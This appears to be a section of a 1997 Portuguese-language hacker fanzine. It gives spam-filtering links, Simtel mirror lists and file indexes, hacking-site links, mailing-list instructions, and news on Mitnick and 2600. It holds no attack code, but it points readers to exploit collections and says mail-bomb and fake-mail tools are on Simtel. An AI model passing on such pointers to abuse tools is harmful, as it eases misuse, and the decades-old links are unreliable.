http://www.anonymizer.com/                  Anonymizer

http://bogong.acci.com.au/~jon/agis/index.html   Lotsa Spam-Fighting Tools

http://www.netusa.net/~eli/filtering.html              Newsgroup Moderation Software

http://www.jazzie.com/ii/internet/procmail/        Infinite  Ink's Procmail

http://www.nepean.uws.edu.au:80/users/david/pe/blockmail.html   Blocking  Email

http://www.acm.uiuc.edu/workshops/procmail/                     Procmail Workshop

http://www.jazzie.com/ii/internet/mailbots.html       Mailbots

http://www.netusa.net/~eli/faqs/addressing.html     Email Addressing FAQ

http://www.jazzie.com/ii/faqs/archive/mail/filtering-faq          Mail Filtering FAQ

http://www-ucsee.eecs.berkeley.edu/~set/spam    More Email Filtering

ftp://ftp.informatik.rwth-aachen.de/pub/packages/procmail        Procmail FTP

http://www-users.informatik.rwth-aachen.de/~berg/archive/ procmail/   Procmail Archive

http://www.panix.com/e-spam.html                       Panix Email Resources

http://www.cis.ohio-state.edu/hypertext/faq/usenet/mail/ filtering-faq/faq.html   Another

Mail Filtering FAQ

http://kryten.eng.monash.edu.au/gspam.html     Help Deciphering Headers

http://digital.net/~gandalf/spamfaq.html         Header Deciphering

Páginas Jurídicas

Jus Navigandi (Pagina Juridica) --> http://www.geocities.com/Paris/1997

O PARAÍSO CHAMADO SIMTEL

Muitos não conhecem um verdadeiro paraíso, na forma de software shareware, gratuito ou coisa do gênero, disponível nos chamados "mirror" dos Simtelnet, um dos mais antigos repositórios de software na rede internet. A vantagem, comparada com grandes sites www como www.shareware.com ou www.download.com é que é relativamente fácil achar o que se que e até o que não se quer, nos índices.. Essa dica é meio de velha guarda, a maioria dos "velhos" fuçadores começou lá (eu, por exemplo). Mas quem não sabe, pode procurar que acha coisa interessante. Sem vírus.

| Australia/1 | Australia/2 | Austria | Brazil/1 | Brazil/2 | Bulgaria |

| Canada | Czech Republic | Finland | Germany/1 | Germany/2 | Hungary |

| Ireland | Israel | Italy | Korea | Norway | Romania | Slovakia |

| Slovenia | South Africa/1 | South Africa/2 | Switzerland |

| UK/1 | UK/2 | USA/1 | USA/2 | USA/3 | USA/4 |

Abaixo, o URL (igonorar o -------> na hora de digitar)

http://www.iniaccess.net.au/simtel.net/ ------>Australia/1

http://ftp.tas.gov.au/simtel.net/ ------>Australia/2

http://www.univie.ac.at/simtel.net/ ------>Austria

http://ftp.unicamp.br/simtel.net/ ------>Brazil/1

http://simtel.correionet.com.br/simtel.net/ ------>Brazil/2

http://www.eunet.bg/simtel.net/ ------>Bulgaria

http://mirror.direct.ca/simtel.net/ ------>Canada

http://pub.vse.cz/simtel.net/ ------>Czech Republic

http://ftp.funet.fi/mirrors/simtel.net/ ------>Finland

http://www.tu-chemnitz.de/HOME/fischer/simtel.net/ ------>Germany/1

http://www.ruhr-uni-bochum.de/simtel.net/ ------>Germany/2

http://www.simtel.iif.hu/ Hungary

http://www.hea.ie/simtel.net/ ------>Ireland

http://www.cs.huji.ac.il/simtel.net/ ------>Israel

http://serviceftp.flashnet.it/simtel.net/ ------>Italy

http://www.iWorld.net/simtel.net/ ------>Korea

http://archive.bitcon.no/simtel.net/ ------>Norway

http://www.sorostm.ro/simtel.net/ ------>Romania

http://ftp.uakom.sk/simtel.net/ ------>Slovakia

http://ftp.arnes.si/simtel.net/ ------>Slovenia

http://simtel.saix.net/ South Africa/1

http://simtelnet.is.co.za/ South Africa/2

http://sunsite.cnlab-switch.ch/simtel.net/ ------>Switzerland

http://ftp.globalnet.co.uk/simtel.net/ ------>UK/1

http://micros.hensa.ac.uk/+misc/simtel.net/ ------>UK/2

http://www.simtel.net/simtel.net/ ------>USA/1

http://oak.oakland.edu/simtel.net/ ------>USA/2

http://ftp.epix.net/simtel.net/ ------>USA/3

http://download.romt.com/simtel.net/ ------>USA/4

Para dar um exemplo do que se pode achar lá, vejamos a lista abaixo (escolhida do subdiretorio pub/simtel.net/msdos/info) Ah, sim. É preciso lembrar que estou pensando no pessoal que programa e quer aprender a mexer com computador ao escolher esta lista e não no pessoal que lê uma das internet-não-o-que da vida que só quer é brinquedinho..:

 asm9709h.zip  (970923)  65K  Sep 97 x86 Assembly Language FAQ, HTML format   asm9709t.zip  (970923)  54K  Sep 97 x86 Assembly Language FAQ, text format   asp804.zip    (961030) 381K  Association of ShareWare Professionals catalog   aspdat71.zip  (970131)  60K  ASP membership list and info in DBF format   author35.zip  (960407)  40K  List of MS-DOS PD & SW author e-mail addresses   bbstip12.zip  (920808)   5K  Effective Shareware distribution via the BBS   bestpr54.zip  (970212)  26K  Timo's choice of best MS-DOS/Win PD/FW/SW pgms   bgi20.zip     (960522) 375K  Computer-based Internet tutorial for beginners   biosdos.zip   (870813)  24K  List of BIOS error codes and what they mean   bkache56.zip  (921203) 173K  Tutorial discusses back pain relief   calfaq.zip    (960904)  20K  Frequently asked questions about calendars   chap32.zip    (890715)  16K  Brief summary of copyright laws   cnd7301.zip   (940103)  71K  ASP ShareWare authors quick-lookup catalog   com3com4.txt  (910131)   5K  Notes on using COMM ports 3 and 4   config.zip    (870124)  13K  How to setup CONFIG.SYS & AUTOEXEC.BAT   copro16a.zip  (940925)  73K  Article on numeric coprocessors for PCs   cpucmp14.zip  (930613)  12K  Perf. comparison 386DX/38600DX/486DLC/RapidCAD   dcc9224.zip   (921002) 129K  List of over 1,000 computer clubs nationwide   devdriv.zip   (851107)   3K  Tutorial on DOS device drivers   diagtxt.zip   (861212)  10K  PC error diagnosis and memory error list   disk-art.zip  (890609)  22K  Articles discussing disks by Steve Gibson   dos32v4.zip   (860517)   4K  Patches to MS-DOS version 3.2   dosfv206.zip  (960331)  56K  FAQ from comp.os.msdos.programmer newsgroup   doshlp20.zip  (950624) 523K  DOSHelp v2.0: Basic DOS Commands Tutor   dosimp10.zip  (910811) 253K  New DOS 5.0 tutorial, for new and oldtimers   dosmnual.zip  (870222)  10K  DOS manual for beginners. Printable   dosref33.zip  (940120) 282K  List of interrupts, memory locations, IO ports   dostips.zip   (871214)  12K  Helpful hints on some DOS functions   dostips1.zip  (851125)  65K  DOS tips from various magazines - part 1 of 6   dostips2.zip  (851125)  58K  DOS tips from various magazines - part 2 of 6   dostips3.zip  (851125)  45K  DOS tips from various magazines - part 3 of 6   dostips4.zip  (860629)  59K  DOS tips from various magazines - part 4 of 6   dostips5.zip  (871018)  60K  DOS tips from various magazines - part 5 of 6   dostips6.zip  (870405)  43K  DOS tips from various magazines - part 6 of 6   dostutor.zip  (860405)  94K  Learn MS-DOS - an interactive tutorial   drdostip.zip  (920101)  62K  DR DOS 6.0 Tech Tips (1/2/92) from DRI BBS   dtarev1.zip   (890118)  17K  Review of SpinRite & Disk Technician Advanced   emailadr.zip  (930828)  20K  Baker's PC Industry E-mail address listing   emailgui.zip  (910104)   6K  How to send E-Mail from one network to another   ext_ram.zip   (890516)   5K  Good discusion of extended vs expanded RAM   faqc9709.zip  (970928) 106K  Frequently Asked Questions of comp.compression   faqclp.zip    (960226)  13K  Frequently Asked Questions of comp.lang.pascal   faqclpb.zip   (960422)   8K  comp.lang.pascal.borland newsgroup Mini-FAQ   ftp-list.zip  (970506) 410K  List of Internet sites with FTP & mail access   ftp2uk23.zip  (920409)   8K  Unix scripts (2) for JANET FT-RELAY   ftpgrep.zip   (940419)   1K  Perl script: Search ftp-list w/regular expr.   gameport.inf  (900519)   3K  How to: read game port, schematic, hookup info   geozone4.zip  (940830)   5K  Internet address two-letter country codes list   glos2.zip     (900225)  63K  Glossary of Telecomputing terms   inter55a.zip  (970928) 353K  Comprehensive list of interrupt calls, 1of4   inter55b.zip  (970928) 353K  Comprehensive list of interrupt calls, 2of4   inter55c.zip  (970928) 353K  Comprehensive list of interrupt calls, 3of4   inter55d.zip  (970928) 506K  Comprehensive list of interrupt calls, 4of4   inter55e.zip  (970928) 273K  Utility programs for interrupt list   inter55f.zip  (970928) 214K  WinHelp hypertext conversion programs   inthlp10.zip  (941111)  53K  Interrupt Helper: Viewer for interrupt list   intshare.zip  (910805)   6K  Info on software interrupt-sharing protocol   intwin54.zip  (970630) 4.2M  R.B.'s Interrupt List 54, Windows Help format   intwin55.zip  (970930) 4.2M  Interrupt List 55, Windows Help format   ip_hook.zip   (910326)  30K  Information on hooking up a PC to the Internet   jarg300a.zip  (930728) 467K  Jargon-File 3.0.0 (Hacker's Dictionary), ASCII   jarg300n.zip  (940303) 521K  Jargon-File 3.0.0 (Hacker's Dictionary), NG   laptut58.zip  (921205) 228K  Laptop Tutorial, tips/tricks for laptop users   maxcat.zip    (930910) 447K  Catalog of over 600 ShareWare programs   mdive5a.zip   (960428)  30K  Heart attack risk assessment program   mf2.zip       (901215)   2K  TSR shows program's memory usage while running   mkdata.zip    (940914)  60K  1000 Internet email,telnet,ftp,gopher,WWW,URLs   moder62.zip   (971018)  29K  List of MS-DOS FTP sites and their moderators   modwks20.zip  (950107) 140K  Modem Workshop v2.0: Modem book on disk   mrdos231.zip  (900105) 147K  DOS tutorial, beginner to hard disk, text/quiz   muf17.zip     (960407)  64K  MicroSoft's Undocumented Features, Vol 1, No 7   newlaw.zip    (901002)   3K  New copyright legislation, shareware problems   nos2.zip      (970324) 957K  The Prophecies of Nostradamus v2.0   nulcable.zip  (910118)   3K  How to make serial/parallel null modem cables   packftp.zip   (941223) 450K  Anonymous FTP Sitelist conversion program   pccdemo.zip   (931219) 577K  PC Complete disk magazine, issues 1 and 2   pcgpe10.zip   (960628) 701K  The PC Games Programmers Encyclopedia 1.0   pcl60a.zip    (960612) 223K  Pc-Learn: Beginners Computer Tutorial, 1 of 2   pcl60b.zip    (960612) 200K  Pc-Learn: Beginners Computer Tutorial, 2 of 2   psychek2.zip  (950527)  25K  Find out your management/personality style   pwrwds23.zip  (960722) 227K  Power words: 4,500 wise and witty quotations   redirect.zip  (900817)   9K  Advanced DOS tips on rerouting, piping, edlin   relative.zip  (871201)   2K  Graphs relative speed of CPU   res16sw.zip   (950503) 1.2M  Monitor repair procedure database. ShareWare   rstutor.zip   (881104)  96K  Tutor for communications, serial interface   rurarj.zip    (970711)  11K  RURARJ: Arj compression command set   sut56.zip     (920705)  44K  Tutorial on how to use and enjoy Shareware   tsfaqp38.zip  (971113) 123K  Common Turbo Pascal questions & Timo's answers   useful35.zip  (940508)  26K  Useful MS-DOS programs at Simtel.Net and Garbo   zen10.zip     (920630)  65K  Jun 1992 Zen and the Art of the Internet   

Esta outra lista vem do subdiretório simtel.net/msdos/c (para quem quer aprender a linguagem C e fazer coisas interessantes):

   Filename      Date   Size  Description   actlib17.zip  (931025)  86K  General purpose libs w/source for C/C++ pgmers   advc11.zip    (870423)   9K  Thomas Hanlin's advanced 'C' routines. v.1.1   asynlib2.zip  (910320)  17K  ASYNC communications library callable from 'C'   bestl232.zip  (940912) 323K  Extensive C programmer's library (FreeWare)   bin2c.zip     (960903)   9K  Convert a binary file to a C structure   bituudec.c    (871224)   7K  MSDOS/VMS UUdecode fixes lost trailing spaces   bltc127.zip   (961115) 220K  Bullet C/C++ 16-bit btree/DBF database engine   bmp2cp11.zip  (970920)  23K  BMP file to C/C++ source file converter   btoa.zip      (890124)   4K  'C' source for binary-to-ascii convert pgm   bullet25.zip  (970702) 895K  Database engine for DOS32,Win32s,Win95,NT,OS/2   c--final.zip  (961128) 640K  Sphinx C--: Compiler, examples & source   c-eval.zip    (930423)  21K  C source to evaluate mathematical expressions   c-flow.zip    (850624)  43K  Display flow of 'C' programs   c4window.zip  (850806)  32K  Window routines for 'C' programs   c60probs.zip  (900617)   6K  List of problems found with MS C v6.0   cacoph10.zip  (940419)   7K  PC speaker music library for Turbo C and C++   calendah.zip  (970124)   9K  ANSI C source for calendar calculations   cbase102.zip  (910922) 267K  C routines for database applications, w/docs   cbooks.zip    (890629)   9K  List of currently available C language books   cc01.zip      (850828)   3K  'C' language functions and programs - 1 of 4   cc02.zip      (860103)  65K  'C' language functions and programs - 2 of 4   cc03.zip      (860103)  81K  'C' language functions and programs - 3 of 4   cc04.zip      (851125)  78K  'C' language functions and programs - 4 of 4   ccc1053a.zip  (891224)  26K  Complete C: learn/experiment w/OO systems,1of3   ccc1053b.zip  (891224) 217K  Complete C: learn/experiment w/OO systems,2of3   ccc1053c.zip  (891224) 293K  Complete C: learn/experiment w/OO systems,3of3   ccdl151e.zip  (970704) 423K  32 bit C compiler for DOS/DPMI   ccdl151l.zip  (970704) 443K  32 bit C compiler run time library   ccdl151s.zip  (970704) 219K  32 bit C compiler sources   ccompile.zip  (850605)  35K  Small 'C' compiler   cdecl.zip     (871020)  11K  Decomposes 'C' language declarations   cephes25.zip  (960913) 600K  Mathematical function library in C language   cfgop110.zip  (950802)  48K  I/O for Windows type INI/CFG files. (C source)   cfog102.zip   (950501)  52K  C source code obfuscator   cgazv5n3.zip  (910507)  44K  Code from the C Gazette - Spring 1991 issue   cl_7_bug.zip  (921008)  17K  Bug examples for Microsoft C-Compiler CL-7.00   cm100exe.zip  (911115)  51K  MAKE for MSC/WIN SDK (exe and samples), 1of4   cm100hlp.zip  (911115) 109K  MAKE for MSC/WIN SDK (QuickHelp), 2of4   cm100txt.zip  (911115)  49K  MAKE for MSC/WIN SDK (Help: text format), 3of4   cmake100.zip  (911115)   1K  MAKE for MSC/WIN SDK (description), 4of4   cnews001.zip  (880622)   6K  Issue #1 'C' programmer's newsletter   cnews002.zip  (880622)   5K  Issue #2 'C' programmer's newsletter   cnews003.zip  (880205)  20K  Issue #3 'C' programmer's newsletter   cnews004.zip  (880221)  42K  Issue #4 'C' programmer's newsletter   cnews005.zip  (880307)  70K  Issue #5 'C' programmer's newsletter   cnews006.zip  (880410)  28K  Issue #6 'C' programmer's newsletter   cnews007.zip  (880529)   9K  Issue #7 'C' programmer's newsletter   cnews008.zip  (880614)  57K  Issue #8 'C' programmer's newsletter   cnews009.zip  (880717)  64K  Issue #9 'C' programmer's newsletter   cnews010.zip  (880815)  49K  Issue #10 'C' programmer's newsletter   cnews011.zip  (880909)  30K  Issue #11 'C' programmer's newsletter   cnews012.zip  (881030)  12K  'C' programming & compiler review #12   cnews013.zip  (881227)  37K  'C' Elec. Newsletter/Journal Vol 2 #13   cnews014.zip  (890222)  62K  'C' Elec. Newsletter/Journal Vol 2 #14   cnews015.zip  (890704)  24K  'C' Elec. Newsletter/Journal Vol 2 #15   cnews016.zip  (890726)  56K  'C' Elec. Newsletter/Journal Vol 2 #16   cnews017.zip  (890924)  16K  'C' Elec. Newsletter/Journal Vol 2 #17   cnews018.zip  (891228)  39K  'C' Elec. Newsletter/Journal Vol 2 #18   cnews019.zip  (900804)  28K  'C' Elec. Newsletter/Journal Vol 2 #19   commasm.zip   (880713)   7K  Info for programming MS-DOS COMM ports   configf.zip   (950430)   2K  Use Windows-like config files in C (w/src)   conio.zip     (870608)   8K  Direct console I/O ASM routines for MicrosoftC   consl10.zip   (950930) 122K  Console text output 16/32 bit C/C++ library   consl11.zip   (960616)  94K  Console text output 16/32 bit C/C++ library   cp14.zip      (920319)  25K  C code outliner (DDJ8808, tweaked for BC++2.0)   cpc2.zip      (960121) 138K  CodePrint for C/C++ Version 2.02 Jan 1996   cprot217.zip  (920614) 102K  C and C++ incremental prototypes extractor   crc-c.zip     (870729)   4K  CRC routines for C   crnchr22.zip  (930412)  67K  C Libs - FFT,Wavelet,Coherence,Filter,Regr.etc   gencsrc.zip   (871120)  90K  Coronado's Generic 'C' tutor v2.0, (1 of 2)   genctxt.zip   (871120) 105K  Coronado's Generic 'C' tutor v2.0, (2 of 2)   mc302pc1.zip  (940318) 190K  MICRO-C PC 'C' compiler v3.02   miracle.zip   (961205) 268K  Miracle C Compiler v1.7   t2c.zip       (871201) 100K  Microsoft's Turbo Pascal to C translator   zcc096.zip    (961104) 245K  Small C compiler, assembler and linker for DOS  Tem muita coisa em C, tentei selecionar acima, mas foi impossível.. imagine C++ entao..    cptuts22.zip  (920119)  75K  Coronodo C++ Tutorial: Source examples, 1/2   cptutt22.zip  (920119) 105K  Coronodo C++ Tutorial: Tutorial text files 2/2   cslib211.zip  (970520) 793K  Database library for C++ developers   dos_win1.zip  (940709) 186K  Windows-like GUI for DOS. BC++ 3.1 source code   jptui4db.zip  (971115) 705K  Textual user interface for Borland C++ 4.x   knowhow4.zip  (950120) 574K  Borland C++ SDK, DOS, source codes. GUI + more   memman2c.zip  (950316)  45K  XMS/EMS/Virtual *Flat* Memory for C++/C   newmat09.zip  (971013) 169K  C++ classes for matrix manipulation   objeas3a.zip  (940829) 502K  Graphic/text user interface C++ library, 1of2   objeas3b.zip  (940829) 238K  Graphic/text user interface C++ library, 2of2   prnstr15.zip  (951023)  21K  Printer Stream Lib for Borland C++ programmers   sdesg10b.zip  (950904)  77K  Sprite Designer for XLIB, c++ for sprite lib.   serial_1.zip  (900513)   4K  C++ source code routines for serial ports   tsr100je.zip  (930320)  70K  TSR class for Borland C++ (with source)  No simtel.net/msdos/sysutils pode-se por exemplo, encontrar emuladores de UNIX pra DOS e outros baratos (todas as listas estao incompletas).     autocmos.zip  (940922)   2K  CMOS memory read/write/auto repair utility   dos94-01.zip  (961023) 490K  Windows 95 style utility menu for DOS   fcii_2_1.zip  (891216)  81K  File Commando v2.1, a PC Tools clone, 1 of 3   fcii_2_2.zip  (891216)  88K  File Commando v2.1, a PC Tools clone, 2 of 3   fcii_2_3.zip  (891209)  73K  File Commando v2.1, a PC Tools clone, 3 of 3   irqr.zip      (880422)   4K  Report status of IRQ channels,w/TP4 & MS C src   is_con10.zip  (911220)   3K  Report if handle is associated with console   jbalarm.zip   (910617)  22K  Alarm/reminder w/multiple sounds. Works w/WIN3   jcfg100.zip   (961122)  18K  Assigns/swaps 'dummy' drive letters   jobs32.zip    (890415)   7K  JOBS v3.20 - DOS shell/Disk manager, 1 of 3   jobs32a1.zip  (890415) 125K  JOBS v3.20 - DOS shell/Disk manager, 2 of 3   jobs32a2.zip  (890415) 127K  JOBS v3.20 - DOS shell/Disk manager, 3 of 3   portfix.zip   (960312)  15K  Fixes SMC super I/O port lockup on 486/Pentium   porttool.zip  (930112) 173K  16 Unix-like tools ported to MS-DOS   sil2.zip      (851013)   6K  Silence PC speaker   silence.zip   (851231)   3K  Turns PC speaker on and off   siren.zip     (891205)   7K  Make siren sounds on PC speaker   skey40.zip    (911223) 325K  Keystroke emulation and batch file utilities   sysfs10.zip   (970620)  65K  System File Save: Backup/restore system files   tstsr21.zip   (960810)  97K  TSR pgms noboot/reslock/timedown/timeup, etc.   ud16_v33.zip  (971110) 4.2M  All 62+ Unix 32-bit utilities for MS-DOS   undoc2eh.zip  (890108)   2K  Demo of undocumented interrupt service 2Eh   uptime.zip    (910119)   2K  Time in days/hours/mins/secs since system boot   uptimer.zip   (961022)   5K  System timer update from real-time clock   util1.zip     (951024) 123K  A group of utilities for MS-DOS   utils1.zip    (890727)   2K  Misc. utilities by E. Miller   utl115.zip    (960405) 168K  Utilities with file viewer and printer support   uxutl23a.zip  (960226) 238K  Unix-like utilities for DOS. Rel 2.3. 1of4   uxutl23b.zip  (960226) 227K  Unix-like utilities for DOS. Rel 2.3. 2of4   uxutl23c.zip  (960226) 221K  Unix-like utilities for DOS. Rel 2.3. 3of4   uxutl23d.zip  (960226) 160K  Unix-like utilities for DOS. Rel 2.3. 4of4   uznix120.zip  (960226) 332K  UZfulnix v1.20: Unix-like utilities for MS-DOS   zutils02.zip  (951016)  52K  Collection of tiny utils HD/file related, lock  Por ultimo, claro que e' besteira reclamar pra mim que so' tem DOS aqui.. Existem tambem subdiretorios especificos para WIN95, Win 3.11 .. nao to dizendo que as pessoas devam ir atras e procurar ai'. Mas pode valer a pena. É uma forma de  garimpar informação. Basta ir atrás dos arquivos 00_index.txt da vida. Até mail bomb e fake mail se encontra.

DICAS DE SOFTWARES

Um amigo, especialista em cracks e coisas do genero, me contou de um cara desesperado pra conseguir um jeito de usar estes softwares. Depois que li a descrição do que faz esses troços, achei que deveria juntar isso como dica. Afinal, nem sempre eu tenho tempo de conhecer tudo. O Zip Folders parece particularmente interessante.. não sei onde se consegue nenhum, talvez no www.shareware.com ou www.cdrom.com..

Wingroov 0.9ec executa midis

Vueprint 5.4 visualiza imagem e midis

Pica View 32 mostra telas em formato thumbs dentro do windows explorer...

Zip Folders 1.0 permite acessar pastas zipadas....

Thumbs 3.0 visualizador de imagens, com recursos de converter formatos

DICAS DE SITES MUITO, MAS MUITO INTERESSANTES..

http://www.alexa.com

http://www.iss.net/xforce/

http://www.altavista.magallanes.net/

http://www.datasoft.com.br/marconci/hack.htm

http://www.ntshop.net/security/exploits.htm

http://www.l0pht.com/

http://berlin.ccc.de/

http://oliver.efri.hr/~crv/security/bugs/NT/nt.html

http://www.ntmag.com/

http://www.ugu.com

http://lebeau.home.ml.org

http://www.savilltech.com/ntfaq.html

http://microlink.com.br/~buick/dragons.htm

http://www.xs4all.nl/~jojo/jogos

http://premium.microsoft.com/support/kb/articles/q150/7/34.asp

http://www.dicas-l.unicamp.br                     <---- Muiiito interessante

Maquinas de busca em espanhol

Olé Ozú El otro Ozú Whom Where El Buscón El buscador mágico Buscador de Archivos

http://www.ole.es  Olé

http://www.ozu.com  Ozú

http://www.ozu.es    El otro Ozú

http://www.spanish.whomwhere.com   Whom Where

http://194.51.86.22   El Buscón

http://www.ctv.es/USERS/amartin       El buscador mágico

http://www.filez.com/espanol2.html      Buscador de Archivos

Um acontecimento contra a liberdade de opiniao e expressao na Espanha

HTTP://ELCASO.VESATEC.COM/#prensa

Hacker-zines brasileiros

Estão saindo uma pá de novos zines. Acho isso legal pacas, já que um dos motivos que criei o Barata Elétrica é exatamente estimular o pessoal a fazer coisa ainda melhor. O chato é que alguns estão simplesmente "puxando" e "copiando" material de outros, algumas vezes até assumindo como se fossem autores da matéria, isso quando não inventam de "encher linguiça" com lista de serial numbers. Outra coisa que está se tornando meio que hábito é fazer página na Geocities, que está caçando e apagando páginas de todo mundo. Todo mundo, literalmente. Se brincar, minha página não está lá.  A Geocities tirou.  Alguns zines são ruins, não tem outra palavra. Outros, dá pra ver que o cara ainda pode fazer algo legal.  E tem outros que o cara teve uma ótima idéia. Não vou falar quais. O duro é sobreviver e continuar. Tem zine que é famosíssimo. Mas não passou do número 2 em mais de 6 meses. Aliás, tem vários nessa situação.  A lista abaixo não define nenhum critério de escolha e é provavel que tais páginas já tenham sumido do mapa. Fica o registro histórico, provavelmente vão renascer em algum lugar.. Ah, sim, ia me esquecendo: como tem zineiro aí que resolveu que meu fanzine não presta, vou fazer a vontade dele e não sujar seu nome colocando ele aqui.

http://www.geocities.com/Paris/Metro/6720/       Conscience

http://www.geocities.com/Broadway/6721/index.html    Rato.br

http://www.geocities.com/SiliconValley/Way/8650/policy.html    Policy - segurança em Unix

http://www.geocities.com/Paris/Metro/6720/     Ezine Conscience

http://www.complex-x.net/kaotik/ptzine/index.htm      Fanzine de Portugal

Nova lista Hackers

Eu descobri um lugar onde qualquer um pode fazer sua própria lista e criei outra lista hackers, desta vez com o nome de hackers.braz

Não sei se vai ter o mesmo sucesso da anterior, que estava hospedada na esquina-das-listas, que todo mundo sabe, já era. Pra se inscrever, vá até o url:   http://www.coollist.com   e se inscreva lá na lista  hackers.braz (não confundir com a lista hackers, que também existe, tém alto volume de correspondência, mas tá cheia de wannabe e lammer, além de ser em inglês).

Ao se inscrever, voce irá receber um email igual a este (mais ou menos) pedindo pra você mandar um reply de confirmação:

> Date: >         Thu, 25 Sep 1997 20:33:01 -0400 (EDT) >     To: >         fulano@rocketmail.com >   From: >         subscribe@coollist.com Add to Address Book >  Subject: >         Confirmation of Subscription >  >  > We have recently been requested by you to subscribe to this >  >                 List:  >  > Please confirm that you want to subscribe by replying to this message. >  > If this subscription is unsolicited, simply delete this message. >  > Thank you. >  > ---------------------------------------------------- > Get a FREE Mailing List at http://208.141.98.157/ >  >  >   Para se desinscrever, manda email para unsubscribe@coollist.com  A resposta deve ser:  > Date: >         Fri, 3 Oct 1997 23:48:09 -0400 (EDT) >     To: >         fulano@rocketmail.com >   From: >         unsubscribe@coollist.com Add to Address Book >  Subject: >         Unsubscribe Request >  >  > To unsubscribe from a Coollist Mailing List, just reply > to this message and enter the name or the email address of > your list between the square brackets: >  >         List: [   ] >  > eg The address of the mailing list you post to >  > Then enter an "X" in the box below: >  >         [ ] UNSUBSCRIBE >  > You will be unsubscribed instantly. Thank you. > -------------------------------------------------------- > Get your FREE Mailing List. http://www.coollist.com >  >  >  >              O que rola é que a pessoa querendo se desinscrever coloca o nome da lista onde quer se desinscrever, tal como:  >         List: [hackers.braz   ] >  > eg The address of the mailing list you post to >  > Then enter an "X" in the box below: >  >         [X] UNSUBSCRIBE  Tudo isso e manda o reply de volta. Aí você está fora da lista.   A confirmação de inscrição ou des-inscrição vem depois, comopor exemplo:  > Date: >         Sun, 28 Sep 1997 08:56:17 -0400 (EDT) >     To: >         Fulano de Tal  >   From: >         hackers.braz@coollist.com Add to Address Book >  Subject: >         You have been subscribed >  >  > Note: This is an automated Response >  > Congratulations! You have been subscribed to the hackers.braz list. > To post to this list, just email your posting to > "hackers.braz@coollist.com" >  > To unsubscribe from this list, just send a blank email to: >         unsubscribe@coollist.com >  > If you did not ask to be subscribed, please send this email to > nospam@coollist.com >  > If you encounter any problems at all, email support@coollist.com >  > Thank you and Have fun! > ------------------------------------------------------ > Get your FREE Mailing List. http://www.coollist.com >  >   Detalhe importante: Esta lista pode ou não se tornar uma sucessora da lista hackers. Tudodepende de quem estiver afim de se inscrever ou não. Eu consideravaa lista hackers como um ponto de encontro, onde todo mundo podia teruma chance de se comunicar. Espero que o pessoal entre nessa.

OUTRA LISTA HACKER(?)

Essa contribuição veio de um leitor:

Majordomo@listserv.pegasus.com.br

subscribe hacker seu@email

LISTA CIBERCULTURA  Esta é uma lista criada por André Lemos, Prof da Faculdade de Comunicação da Universidade Federal da Bahia e tem como base a discussão de temas ligados a cultura Cyber (que não é  exatamente a ver com a cultura hacker, é bom notar). Se você tiver interesse em discutir novas tecnologias, lances de cabeça, etc, tudo bem. Pedir cracks pra joguinho, perguntar como se faz para atravessar uma FIREWALL, como se tornar um hacker, isso daí não tem  absolutamente NADA a ver com a lista. Se voce tem alguma idéia sobre cultura cyber, esse é o lugar para entender, tentar entender ou discutir..  Para se inscrever:  Enviar correio eletronico para listproc@ufba.br com o seguinte conteúdo:  subscribe cibercultura  Seu-nome-fulano   Para se desinscrever:  Mesmo correio eletrônico, outro conteúdo:  unsubscribe cibercultura   Para ver informações:  help, info, sei lá.. o listproc devolve um arquivo em ingles com o funcionamento da coisa toda, se eu estiver errado.   Para contribuir para a lista:  Correio eletronico para cibercultura@ufba.br

MITNICK NEWS  To: cypherpunks@toad.com Subject: Mitnick Rings Bell  6 de novembro 1997, notícia da Digital Cellular Report:  O governo americano adota linha dura com Mitnick. Hacker americano pede ajuda.  Um "hacker" americano - Kevin David Mitnick - preencheu um pedido para ajuda  financeira para lutar por sua defesa, através de seu advogado, Donald  C Randolph de Santa Monica, EUA. Através de Randolph, Mitnick está clamando que o governo americano está procurando fazer dele um exemplo pela possessão de códigos de  acesso não-autorizados a (fone) celular. O caso é particularmente importante para o mercado norte-americano, onde fones celulares analógicos, ao invés de digitais, são norma.  Em uma das mais interessantes declarações, Mitnick afirma ter sido mantido em  solitária por 23 horas diárias, nu em uma cela de ar condicionado congelante por 8 meses e mandado para o chuveiro acorrentado. Talvez o aspecto mais intrigante em todo o caso é o fato de que enquanto o governo americano nunca procurou provar que Mitnick "faturou" de suas atividades de "hacker" - embora certamente pudesse ter feito tal coisa através da "venda" de tempo online para terceiros. Ao invés disso afirmam  que ele causou perdas de 80 milhões. Kevin certamente parece estar pagando o preço por feitos nefastos, tendo já gastado próximo de dois anos em custódia, em cujo tempo foi proibido de fazer acesso a comunicações sem fio,  software ou hardware. É difícil saber exatamente qual lado está mais paranóico, já que Mitnick está afirmando que sua sina é parte de um complô do governo  americano para afastar o escrutínio que concerne a regulamentação tanto das  telecomunicações como da internet.  http://www.kevinmitnick.com/

2600 - Hacker Quaterly - à beira do abismo

A última desgraça que está rolando no pedaço é a notícia de que o mais famoso fanzine de Hackers, o 2600-Hacker Quaterly, está a beira da falência. A distribuidora do fanzine, (fazer o zine é uma coisa, vender por todo o país, é tarefa da distribuidora) brincou demais com a grana dos caras e ... entraram em concordata ou coisa do gênero. Os caras que assumiram a empresa depois também brincaram um pouco e parece que a coisa lá vai mal. O Goldstein não entrou em concordata, acha que dá pra levar  a empresa adiante, mas tá russa, a coisa. Se piorar, vai ser o terceiro fanzine famoso a sair do ar, junto com o Hack-Tic e o Vírus Report. Por essas e outras que não transformei o Barata Elétrica num evento comercial.. ou mesmo criar uma revista com nome real, menos maldito. Quem quiser maiores informações, dá uma olhada no www.2600.com  . Minha opinião é que o cara vai se safar dessa, o difícil vai ser o pessoal fazer assinaturas por uns tempos. A próxima edição vai atrasar, isso tá avisado na página.

Encontros de Hackers em São Paulo, Rio e Belo Horizonte:

Em São Paulo, começaram a acontecer, embora não em horários  e datas regulares, encontros de hackers. Aqueles que se interessarem, está  sendo criada uma lista para a divulgação desses encontros. Provavelmente vai rolar na lista hackers.braz ou qualquer outra que estiver disponível. Como é que estão sendo? Bom, tem gente comparecendo e não só wannabes. Mas como de vez em quando pinta um "desencontro",  acho prematuro eu chegar aqui e divulgar página tal, provedor tal, pelo simples fato que:

1) ainda acho cedo

2) esse fanzine fica em html, zip e txt por tudo quanto e' lugar do mundo. Falar que bar tal ou pagina tal esta' acontecendo isso ou aquilo, é uma verdadeira propaganda pra qualquer estabelecimento. Minha página no geocities continua recebendo visitas, apesar de ser de outro cara, agora ( a Geocities resolveu detonar com minha página no SiliconValley/5620)

3) Quero fazer uma página com o local de encontros hackers no Brasil inteiro. Vai fica na mesma página em que estiver os ultimos números do Barata Elétrica.

